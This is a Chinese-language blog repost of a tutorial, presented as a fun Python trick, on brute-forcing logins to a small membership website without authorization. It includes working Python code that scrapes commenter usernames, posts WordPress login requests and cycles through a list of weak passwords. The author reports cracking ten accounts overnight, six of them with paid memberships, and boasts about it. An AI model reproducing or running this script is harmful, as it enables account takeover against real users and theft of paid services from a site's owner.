Python騷操作 | 用python爆破某會員網站
早上照例閑逛,發現簡書出了個很有意思的作者,ID叫做爺是奧巴馬,發的文章也是不同凡響,上來就對別人家網站玩爆破。。。
原帖地址在這裡:用python爆破某會員網站
————————————————————————————————
暑假在家上網,qq群里一位好友給我說他想要某個網站的會員,ps(是個小網站),本著助人為樂的精神我去踩了點。。。
然後就有了思路(騷操作)
先講一下思路
1 .先註冊用戶登錄
2.flidder抓包
3.python 模擬登錄4.在評論區抓取評論的用戶名5.弱密碼爆破登錄
登錄頁面如下
flidder抓包
抓包之後發現有以下幾個欄位
"log": "admin", # 用戶名 "pwd": "admin", # 密碼 "wp-submit": "登錄", "redirect_to": "", "wpuf_login": "true", "action": "login", "_wpnonce": "4b4e82f670", "_wp_http_referer": "/%e7%99%bb%e5%bd%95?loggedout=true"
只要用戶名和密碼不同,其他的不變
python 模擬登錄
這部分就比較簡單,用到requests模塊
import reimport requestsdef baopo(log): url = "http://XXXXXX.com/%e7%99%bb%e5%bd%95" headers = { "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:55.0) Gecko/20100101 Firefox/55.0", "Referer": "http://XXXXXX.com/%e7%99%bb%e5%bd%95?loggedout=true" #網站打碼 } data = { "log": log, "pwd": "admin", "wp-submit": "登錄", "redirect_to": "", "wpuf_login": "true", "action": "login", "_wpnonce": "4b4e82f670", "_wp_http_referer": "/%e7%99%bb%e5%bd%95?loggedout=true" } a = requests.post(url, headers=headers, data=data) if a.history == []: return False else: return True
得到用戶名
這部分主要用到正則模塊匹配就行了
import reimport requestsdef gethtml(url): headers = { "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:55.0) Gecko/20100101 Firefox/55.0", "Referer": "http://XXXXXX.com/%e7%99%bb%e5%bd%95?loggedout=true" } html = requests.get(url, headers=headers) return html.textfor i in range(30,36): if i == 1: url = "http:/XXXXXX.com/" else: url = "http://XXXXXXX.com/page/" + str(i) html = gethtml(url) for each in re.findall("<a href="(.*?)" class="zoom" rel="bookmark"", html): print(each) if int(each[-4:].replace("/","").replace("s","")) < 100: for each2 in re.findall("<strong>(.*?)</strong>:", gethtml(each)): if "href" in each2: each2 = re.findall("class="url">(.*?)</a>", each2)[0] f = open("yonghu.txt","a+",encoding="utf-8") f.write(each2) f.write("
") f.close() print(each2)
得到用戶名保存在yonghu.txt文件里
開始爆破
本來想加上多線程,但因為網站太垃圾了,訪問過快會限制,那就算了吧。。。
import requestsimport multiprocessingdef baopo(log): url = "http://XXXXX.com/%e7%99%bb%e5%bd%95" headers = { "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:55.0) Gecko/20100101 Firefox/55.0", "Referer": "http://XXXXX.com/%e7%99%bb%e5%bd%95?loggedout=true" } pwd =["000000","111111","11111111","112233","123123","123321","123456","12345678","654321","666666","888888","abcdef","abcabc", "abc123","a1b2c3","aaa111","123qwe","qwerty","qweasd","admin", "password","p@ssword","passwd","iloveyou","5201314","88888888","147258369","1234567890"] pwd.append(log) for each in pwd: print("using>>>"+each) data = { "log": log, "pwd": each, "wp-submit": "登錄", "redirect_to": "", "wpuf_login": "true", "action": "login", "_wpnonce": "4b4e82f670", "_wp_http_referer": "/%e7%99%bb%e5%bd%95?loggedout=true" } a = requests.post(url, headers=headers, data=data) if a.history == []: continue else: f = open("success.txt","a+",encoding="utf-8") f.write("User:") f.write(log) f.write(" Passwd:") f.write(each) print("succeed!
") return Truef = open("yonghu.txt","r", encoding="utf-8")yonghuming = set()yonghuming.add("adminn")for line in f.readlines(): line = line.strip() yonghuming.add(line)if __name__ == "__main__": for each in yonghuming: #p = multiprocessing.Process(target=baopo, args=(each,)) #p.start() print(each) baopo(each)#print(yonghuming)
運行效果圖
收穫
放在伺服器上跑了一晚,爆出來10個賬號,其中6個充值了會員,美吱吱
————————————————————————————————
你想更深入了解學習Python知識體系,你可以看一下我們花費了一個多月整理了上百小時的幾百個知識點體系內容:
【超全整理】《Python自動化全能開發從入門到精通》筆記全放送
推薦閱讀: